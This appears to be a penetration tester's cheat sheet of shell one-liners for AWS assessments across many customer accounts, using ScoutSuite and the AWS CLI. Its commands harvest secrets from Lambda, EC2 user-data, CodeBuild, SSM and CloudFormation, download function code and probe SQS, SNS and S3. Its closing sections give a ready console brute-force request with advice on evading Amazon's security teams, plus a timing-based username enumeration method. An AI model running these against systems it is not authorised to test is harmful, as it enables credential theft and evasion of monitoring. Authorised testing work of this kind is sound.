ScoutSuite Reconnaissance
These oneliners are useful for extracting data from multiple ScoutSuite reports, which usually comes up when several accounts are provided as in scope. Pulling specific information across all the resources, all the regions, and all the accounts can be very cumbersome. These oneliners assume you have already run ScoutSuite against all the accounts using the credentials, or a configured AssumeRole ARN, that the customer provided.
ScoutSuite Against Multiple Accounts
Most customers provide us a list of accounts that we need to test. Scaling our cloud offering to support engagements like this is a lot of work when done manually. Because ScoutSuite doesn't support multi-account runs, I usually create a separate profile for each of the customer's accounts. Outpost is a tool that helps generate account profiles for an account with AssumeRole privileges, as well as generate critical findings in our report format.
The following oneliner runs ScoutSuite and generates a report and log file for each account, once a profile for each account number has been set up in the ~/.aws/config file.
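Example AssumeRole Profile in ~/.aws/config
As a rough sketch, each generated profile might look like the following when the customer provides an AssumeRole ARN (the account number, role name, and source profile here are placeholders):
[profile 111111111111]
role_arn = arn:aws:iam::111111111111:role/CustomerAuditRole
source_profile = default
region = us-east-1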
ScoutSuite Account Loop
cat accounts.txt | while read a; do python scout.py aws --profile $a --no-browser --report-dir ./reports/$a/ --report-name $a --logfile ./logs/$a.log; done
Extract unique URL’s from each txt file
After extracting the below resource data from ScoutSuite reports, it’s good to also extract the URL’s from all of the files. It’s helpful for identifying additional attack surfaces.
grep -hEo "(http|https|ftp|ftps)://[a-zA-Z0-9./?=_-]*" *.txt | sort -u
Process file from the Outpost data_archive and Open Report
(example uses sendmessage_authorized_to_all_principals.txt)
cat sendmessage_authorized_to_all_principals.txt | sed -e 's/,/ /g' | sort -u | awk '{cmd="open ../"$1"/"$1".html"; cmd | getline rep; print rep}'
Resource Reconnaissance
Clone the following repo and follow installation instructions to identify all service resources: https://github.com/JohannesEbke/aws_list_all
Retrieve all resources for each account and the regions you want
for a in $(cat accounts.txt); do aws-list-all query --directory ./archive/data/$a --profile $a --region us-east-1 --region us-east-2 --parallel 20; done
Display number of resources for each service
for a in $(cat accounts.txt); do aws-list-all show ./archive/data/$a/*; done
Display resources for each service
Retrieve all resources for all accounts in verbose mode
for a in $(cat accounts.txt); do aws-list-all show ./archive/data/$a/* --verbose; done
Retrieve all resources for all accounts in verbose mode, into separate files
for a in $(cat accounts.txt); do aws-list-all show ./archive/data/$a/* --verbose > all_"$a"_resources.txt; done
Parse all resource files into one file and extract counts then sort
This will drastically help you focus on the resources that actually exist. Once you have the data, you will need to grep specific resource types out of the individual files, so I'd recommend first retrieving all resources for each account into separate files.
Step 1: Grab just the counts using aws-list-all
for a in $(cat accounts.txt); do aws-list-all show ./$a/* >> all_resources_counts.txt; done
Step 2: Do some sed, sort, and awk to sum up the total of each resource type
cat all_resources_counts.txt | sed -e 's/ .*-.*-[0-9]//g' -e 's/ >//g' | grep -v '^$' | sort -u | awk '{a[$1" "$2" "$3]+=$4;}END{for(i in a)print i" "a[i];}' | sort -u
Step 3: Analyze the results and zero in on specific resource types
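For example, once the summary shows which services actually have resources, grep the per-account files for a specific service (the account number and service name here are just placeholders):
grep -i 'dynamodb' all_111111111111_resources.txt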
EC2 User-data
A lot of customers deploy EC2 instances with user-data to provision and on-board instances within their fleet. If you inspect the user-data, you will regularly find credentials, tokens, keys, passwords, URLs, and other sensitive information. This oneliner searches all child folders for the scoutsuite_results_xx.js file, converts it into usable JSON, then queries all regions/vpcs/instances for user_data.
EC2 User-data that ScoutSuite thinks is Secrets
find . -type f -name 'scoutsuite_results*.js' -exec tail -n +2 {} \; | jq '.services.ec2.regions[].vpcs[].instances[] | select (.user_data_secrets != null) | .arn, .user_data_secrets'
All EC2 User-data
find . -type f -name 'scoutsuite_results*.js' -exec tail -n +2 {} \; | jq '.services.ec2.regions[].vpcs[].instances[] | select (.user_data != null) | .arn, .user_data'
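Retrieve EC2 User-data Directly from AWS
If the ScoutSuite data is missing an instance, the same user-data can be pulled straight from the API; the profile and instance ID below are placeholders, and base64 -D assumes macOS (use -d on Linux):
aws --profile PROFILE --region us-east-1 ec2 describe-instance-attribute --instance-id i-0123456789abcdef0 --attribute userData --query 'UserData.Value' --output text | base64 -D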
Lambda
Lambda functions are mini serverless compute environments that sometimes need access to data that can be modified on the fly, so AWS allows functions to be provisioned with environment variables. As a tester, extracting environment variables is a great way to uncover sensitive data like credentials, tokens, keys, and other useful information. This oneliner searches all child folders for the scoutsuite_results_xx.js file, converts it to usable JSON, then queries all regions and functions for env_variables.
Extract environment variables for each function from Scout
for r in $(find . -type f -name 'scoutsuite_results*.js'); do cat "$r" | tail -n +2 | jq '.services.awslambda.regions[].functions[] | select (.env_variables != []) | .arn, .env_variables'; done
Lambda Function Code
Inspecting Lambda function code is important because a lot of organizations embed hardcoded secrets in their functions. As a tester, you can uncover sensitive data like credentials, tokens, keys, and other useful information by downloading and unzipping the function code. The standard minimal read-only policy in ScoutSuite doesn't have the ability to read this data; the lambda:GetFunction permission needs to be added to the policy. This oneliner searches all child folders for the scoutsuite_results_xx.js file, converts it to usable JSON, queries for all the Lambda ARNs, parses them, and then calls get-function to retrieve the download URL. The output is in CSV format.
Retrieve download URL for each function from Scout
for r in $(find . -type f -name 'scoutsuite_results*.js'); do cat "$r" | tail -n +2 | jq '.services.awslambda.regions[].functions[] | select (.arn) | .arn'; done | sed -e 's/:/ /g' -e 's/"//g' | awk '{cmd="aws --profile "$5" --region "$4" lambda get-function --function-name "$7" --query Code.Location"; cmd | getline url; print $5,$4,$7, url}' | sed -e 's/"//g' | awk '{print $1","$2","$3","$4}' > lambda_function_code.txt
Retrieve download URL for each function from AWS
for a in $(cat accounts.txt); do for region in {"us-east-1","us-east-2"}; do aws --profile $a --region $region lambda list-functions --query 'Functions[*].FunctionArn' | jq -r '.[]' | sed -e 's/:/ /g' -e 's/"//g' | awk '{cmd="aws --profile "$5" --region "$4" lambda get-function --function-name "$7" --query Code.Location"; cmd | getline url; print $5,$4,$7, url}' | sed -e 's/"//g' | awk '{print $1","$2","$3","$4}'; done; done > all_lambda_urls.txt
Extract the URLs from the above CSV output
cat lambda_function_code.txt | sed -e 's/,/ /g' | grep -v null | awk '{print $4}' > lambda_urls.txt
Download all the URL’s (requires parallel)
WARNING: Download links have a short timeout window
cat lambda_urls.txt | parallel --gnu "wget -q {}"
Rename all the Zips and add an extension
find . -type f -exec mv '{}' '{}'.zip \;
Unpack all the zips into their own directory
ls *.zip | sed -e 's/?/ /g' | awk '{print $1}' | parallel --gnu "unzip -d {} {}*"
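Quick Grep for Obvious Secrets
Before moving on to GoldDigger (below), a quick grep over the unpacked function code can surface obvious secrets; the patterns here are only illustrative:
grep -rniE '(password|secret|token|api[_-]?key|aws_access_key_id)' ./*/ 2>/dev/null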
GoldDigger to search for sensitive information within source code
https://git.nopsled.me/mike.felch/golddigger
git clone https://git.nopsled.me/mike.felch/golddigger
cd golddigger
virtualenv -p python3 .
source bin/activate
python dig.py --help
SQS Queues
One of the more under-discussed attack surfaces within AWS, SQS queues are regularly misconfigured to authorize any AWS principal to use actions such as ReceiveMessage/SendMessage. Enumerating SQS queues with receive-message can sometimes provide a message payload to reuse during send-message testing. This oneliner simply extracts the queue URLs from all scoutsuite_results_xx.js files, which you can then use with aws sqs receive-message --queue-url <queue_url> from your own external account. Don't forget to change the region.
Extract each queue URL
for r in $(find . -type f -name 'scoutsuite_results*.js'); do cat "$r" | tail -n +2 | jq '.services.sqs.regions[].queues[] | select (.QueueUrl) | .QueueUrl' ; done | sed -e 's/"//g' > sqs_urls.txt
Test each queue URL using Receive Message
for q in $(cat sqs_urls.txt); do echo "$q" && aws sqs receive-message --queue-url "$q" --region us-east-1; done
Test each queue URL using Send Message
for q in $(cat sqs_urls.txt); do echo "$q" && aws sqs send-message --queue-url "$q" --message-body "BHIS Test" --region us-east-1; done
Extract each queue and test using proper region
for r in $(find . -type f -name 'scoutsuite_results*.js'); do cat "$r" | tail -n +2 | jq -r '.services.sqs.regions[].queues[] | select (.arn) | .arn' | sed -e 's/:/ /g' | awk '{print $5" => "$6; cmd="aws --profile "$5" sqs send-message --region "$4" --queue-url https://queue.amazonaws.com/"$5"/"$6" --message-body \"BHIS Pentest: Please send a screenshot to mike@blackhillsinfosec.com\""; cmd | getline response}'; done
ACM Certificates
AWS Certificate Manager is a great place to find additional attack surface. By listing the certificates and extracting the domain names, you can quickly identify new potential targets.
Extract All Hosts from ACM Certificates
for a in $(cat accounts.txt); do aws --profile $a acm list-certificates --region us-east-1 | jq -r '.CertificateSummaryList[] | select (.DomainName) | .DomainName' >> all_cert_hosts.txt; done
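Resolve Extracted Certificate Hosts
As a follow-on sketch, strip wildcard prefixes and resolve the extracted hosts to see which are live (assumes all_cert_hosts.txt from the previous command):
for h in $(sed -e 's/^\*\.//' all_cert_hosts.txt | sort -u); do echo "$h" && dig +short "$h"; done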
SNS Topics
Similar to SQS queues, SNS topics are another under-discussed attack surface within AWS. SNS topics are regularly misconfigured to authorize any AWS principal to use actions such as Publish/Receive/Subscribe. A lot of the time, SNS topics have subscriptions tied to other AWS resources like SQS, Lambda, or even email distribution groups. This oneliner extracts the ARNs for each of the SNS topics across all scoutsuite_results_xx.js files. Don't forget to change the region.
Extract each topic ARN
for r in $(find . -type f -name 'scoutsuite_results*.js'); do cat "$r" | tail -n +2 | jq '.services.sns.regions[].topics[] | select (.arn) | .arn' ; done | sed -e 's/"//g' > sns_topics.txt
Test each topic ARN
for q in $(cat sns_topics.txt); do echo "$q" && aws sns publish --message "BHIS Pentest, please email <your email> stating you received this message" --topic-arn "$q" --region us-east-1; done
Extract each topic and test using proper region
for r in $(find . -type f -name 'scoutsuite_results*.js'); do cat "$r" | tail -n +2 | jq -r '.services.sns.regions[].topics[] | select (.arn) | .arn' | sed -e 's/:/ /g' | awk '{print $5" => "$6; cmd="aws --profile "$5" sns publish --region "$4" --topic-arn \""$1":"$2":"$3":"$4":"$5":"$6"\" --message \"BHIS Pentest: Please send a screenshot to mike@blackhillsinfosec.com\""; cmd | getline response}'; done
S3 Buckets
Storage in AWS is handled by S3. Extracting all the S3 bucket names and then attempting to list files from a separate account is a quick way to identify misconfigured buckets. Looking for interesting files in S3 is a great way to gain lateral movement or privilege escalation. Additionally, gaining access to sensitive data is a common engagement objective, so checking S3 buckets is a great way to accomplish this task.
Extract each bucket name
for r in $(find . -type f -name 'scoutsuite_results*.js'); do cat "$r" | tail -n +2 | jq '.services.s3.buckets[] | select (.name) | .name' ; done | sed -e 's/"//g'
Recursively List Files in All Account Buckets
for a in $(cat accounts.txt); do for b in $(aws --profile $a s3 ls | awk '{print $3}'); do echo "$a,$b" && aws --profile $a s3 ls s3://$b --recursive; done; done >> archive/data/s3_files.txt
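Test Bucket Listing from an Unauthenticated Perspective
The prose above mentions testing from a separate account; a related quick check is whether buckets allow completely unauthenticated listing. This sketch assumes the extracted bucket names were saved to s3_buckets.txt (a placeholder filename):
for b in $(cat s3_buckets.txt); do echo "$b" && aws s3 ls "s3://$b" --no-sign-request --region us-east-1; done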
CloudFormation
Sensitive information in CloudFormation, such as passwords and credentials, can be hunted by querying AWS for the stack parameters and outputs. Sometimes customers deploy CloudFormation templates with sensitive data for provisioning services instead of using Secrets Manager or the Systems Manager Parameter Store. Don't forget to change the region.
for a in $(cat accounts.txt); do echo "$a" && aws --profile "$a" cloudformation describe-stacks --query 'Stacks[*].[StackName, Description, Parameters, Outputs]' --region us-east-1; done
External Host Addresses
Externally accessible infrastructure can be identified by querying all the resources available within the AWS account. Once you have the external infrastructure, you can follow your normal external pentest workflows. Don't forget to change the region.
EIP Addresses
for a in $(cat accounts.txt); do echo "$a" && aws --profile "$a" ec2 describe-addresses --query 'Addresses[*].PublicIp' --region us-east-1; done | grep "\"" | sed -e 's/\"//g' -e 's/,//g'
EC2 IP Addresses
for a in $(cat accounts.txt); do echo "$a" && aws --profile "$a" ec2 describe-instances --query 'Reservations[].Instances[].PublicIpAddress' --region us-east-1; done | grep "\"" | sed -e 's/\"//g' -e 's/,//g'
ELB Addresses
for a in $(cat accounts.txt); do echo "$a" && aws --profile "$a" elbv2 describe-load-balancers --query 'LoadBalancers[*].DNSName' --region us-east-1; done | grep "\"" | sed -e 's/\"//g' -e 's/,//g'
RDS Addresses
for a in $(cat accounts.txt); do echo "$a" && aws --profile "$a" rds describe-db-instances --query='DBInstances[*].Endpoint.Address' --region us-east-1; done | grep "\"" | sed -e 's/\"//g' -e 's/,//g'
API Gateways
for a in $(cat accounts.txt); do echo "$a" && aws --profile "$a" apigateway get-rest-apis --region us-east-1; done | grep "\"id\"" | sed -e 's/:/ /g' | awk '{print $NF}' | sed -e 's/\"//g' -e 's/,//g' | awk '{print $1".execute-api.us-east-1.amazonaws.com"}'
Elastic Beanstalk Addresses
for a in $(cat accounts.txt); do echo "$a" && aws --profile "$a" elasticbeanstalk describe-environments --query 'Environments[*].EndpointURL' --region us-east-1; done | grep "\"" | sed -e 's/\"//g' -e 's/,//g'
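Combine Into a Single Target List
If each of the above queries is redirected to its own file (the filenames below are placeholders), the results can be merged into one de-duplicated target list for your normal external workflow:
cat eip_addresses.txt ec2_ips.txt elb_hosts.txt rds_hosts.txt apigw_hosts.txt beanstalk_hosts.txt 2>/dev/null | sort -u > external_targets.txt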
CodeBuild Secrets
AWS provides developers a fully managed CI service called CodeBuild. Sometimes developers provision environment variables with sensitive data or credentials. To identify potential secrets, we first query an account for all the project names. We then compile a space-delimited list of those names and query the batch-get-projects endpoint, which returns the environment variables. They are name/value pairs that may contain passwords, keys, or other useful information. Don't forget to change the region.
CodeBuild Projects
for a in $(cat accounts.txt); do echo "$a" && aws --profile "$a" codebuild list-projects --query 'projects[*]' --region us-east-1 | jq -r '.[]'; done
CodeBuild Environment Variables
aws codebuild batch-get-projects --names PROJECT1 PROJECT2 --query "projects[*].environment" --region us-east-1
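CodeBuild Environment Variables for All Accounts
As a sketch, the two steps can be combined into a single loop (this assumes each account has at least one project and stays under the 100-name limit of batch-get-projects):
for a in $(cat accounts.txt); do echo "$a" && aws --profile "$a" codebuild batch-get-projects --names $(aws --profile "$a" codebuild list-projects --query 'projects[*]' --output text --region us-east-1) --query 'projects[*].environment.environmentVariables' --region us-east-1; done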
SSM Parameter Secrets
The AWS Systems Manager Parameter Store holds text values and credentials for use within AWS services, which sometimes include sensitive data worth gathering. First, query SSM for the parameters. Then examine each parameter's type to see whether or not it is secured; if it is not, you can retrieve the parameter value directly. Don't forget to change the region.
Describe Parameters
for a in $(cat accounts.txt); do echo "$a" && aws --profile "$a" ssm describe-parameters --query 'Parameters[*].[Name, Description, Type]' --output text --region us-east-1; done
Retrieve Parameter Value
aws ssm get-parameter --name 'PARAMETER-NAME' --query 'Parameter.Value' --output text --region us-east-1
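Retrieve All Unsecured Parameter Values
As a sketch, the value of every parameter that is not a SecureString can be pulled per account (assumes parameter names contain no whitespace):
for a in $(cat accounts.txt); do for p in $(aws --profile "$a" ssm describe-parameters --query 'Parameters[?Type!=`SecureString`].Name' --output text --region us-east-1); do echo "$a,$p" && aws --profile "$a" ssm get-parameter --name "$p" --query 'Parameter.Value' --output text --region us-east-1; done; done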
Unencrypted EBS
A common finding with ScoutSuite is unencrypted volumes and snapshots. Depending on how large the environment is, these can quickly number in the thousands. Instead of including each individual snapshot and volume in the report, supply the full list within the data archive and just provide a high-level overview of the number of unencrypted resources per account. To do this, extract the resources missing encryption into a text file using Outpost and parse the results into a summary using the following:
Volumes
cat ebs_volume_not_encrypted.txt | cut -d, -f1 | sort -n | uniq -c | awk -vOFS=, '{print "Account: "$2" with "$1" Unencrypted Volumes"}'
Snapshots
cat ebs_snapshot_not_encrypted.txt | cut -d, -f1 | sort -n | uniq -c | awk -vOFS=, '{print "Account: "$2" with "$1" Unencrypted Snapshots"}'
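Verify Counts Directly from AWS
As a sanity check on the Outpost numbers, the count of unencrypted volumes can also be pulled straight from the API (don't forget to change the region):
for a in $(cat accounts.txt); do echo "$a" && aws --profile "$a" ec2 describe-volumes --filters Name=encrypted,Values=false --query 'length(Volumes)' --region us-east-1; done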
CloudTrail
Be sure to check that each region is configured for CloudTrail; otherwise, an attacker who successfully deploys resources could evade logging and monitoring by selecting a region where CloudTrail is not enabled.
Carve the accounts and regions from the Outpost data
cat cloudtrail_service_not_configured.txt | sed -e 's/.NotConfigured//g' -e 's/cloudtrail.regions.//g' | awk -F ',' '{if($1 in accounts){accounts[$1]=accounts[$1] OFS $2} else {accounts[$1]=$2}} END {for(a in accounts) {print a; split(accounts[a],arr," "); for(i in arr) {print arr[i]}}}'
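Verify Trails Directly from AWS
Multi-region coverage can also be confirmed straight from the API; any trail with IsMultiRegionTrail set to true covers every region:
for a in $(cat accounts.txt); do echo "$a" && aws --profile "$a" cloudtrail describe-trails --query 'trailList[*].[Name, HomeRegion, IsMultiRegionTrail]' --output text --region us-east-1; done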
Credential Reports and Passwords
Examining when users were created and when passwords were last changed is vital when an AWS account does not have a password policy set. On November 18th, 2020, Amazon changed the default password policy to require a minimum of 8 characters, including a mixture of special and numeric characters, and to prohibit passwords identical to the AWS account name or email address. This means that if an AWS account does not have a password policy set and a user's password was last set prior to 2020-11-18, that user account is at risk of having a weak password. The following statements will help generate and retrieve the credential report (https://aws.amazon.com/blogs/security/aws-iam-introduces-updated-policy-defaults-for-iam-user-passwords/):
Check Password Policies
for a in $(cat accounts.txt); do echo "$a" && aws --profile "$a" iam get-account-password-policy; done;
If no password policy is set, run the following commands and check the user account dates
Generate Credential Reports
for a in $(cat accounts.txt); do echo "$a" && aws --profile $a iam generate-credential-report; done;
Retrieve Credential Reports
for a in $(cat accounts.txt); do echo "$a" && aws --profile $a iam get-credential-report --output text --query Content | base64 -D >> "$a.csv"; done;
Parse Credential Reports for Dates
for c in $(ls *.csv); do echo "$c" && cat "$c" | sed -e 's/,/ /g' | awk '{print $1,$3,$6}' | sed -e 's/ /,/g' | column -t -s,; done
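Flag Passwords Last Changed Before 2020-11-18
Assuming the standard credential report column order (user, arn, user_creation_time, password_enabled, password_last_used, password_last_changed, ...), a simple lexicographic date comparison flags the at-risk users described above:
for c in $(ls *.csv); do echo "$c" && awk -F, '$4 == "true" && $6 < "2020-11-18" {print $1","$6}' "$c"; done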
Parse Credential Reports for Root MFA
for c in $(ls archive/data/credential_reports/*.csv); do echo "$c" && cat "$c" | sed -e 's/,/ /g' | awk '{print $1,$8}' | sed -e 's/ /,/g' | column -t -s, | grep "root_account"; done
Brute Force Passwords
This is not public tradecraft. The following request can be repeated; just replace the account, username, and password using Burp Intruder. I suggest creating a Fireprox proxy pointed at us-east-2.signin.aws.amazon.com and adding an X-My-X-Forwarded-For header so that you can avoid Amazon security teams. AWS does NOT have a lockout policy (https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_passwords_account-policy.html):
POST /authenticate HTTP/1.1
Host: us-east-2.signin.aws.amazon.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Content-Length: 192
Connection: close
action=iam-user-authentication&account=XXXX&username=XXXX&password=XXXX&client_id=arn%3Aaws%3Asignin%3A%3A%3Aconsole%2Fcanvas&redirect_uri=https%3A%2F%2Fconsole.aws.amazon.com%2Fconsole%2Fhome
Username Enumeration
This is not public tradecraft - it seems to be patched now :( Using the above authentication POST payload with the Timeinator plugin for Burp, it's possible to enumerate valid usernames. Load the usernames in the Payload section of the Attack tab. For "Number of requests for each payload", set it to 10. Next, add a marker around the username variable and click "Start Attack". Finally, sort the results panel on "Minimum (ms)"; all the real accounts will have the lowest time, with the bad accounts showing a minimum time 10-20 ms higher than the good accounts.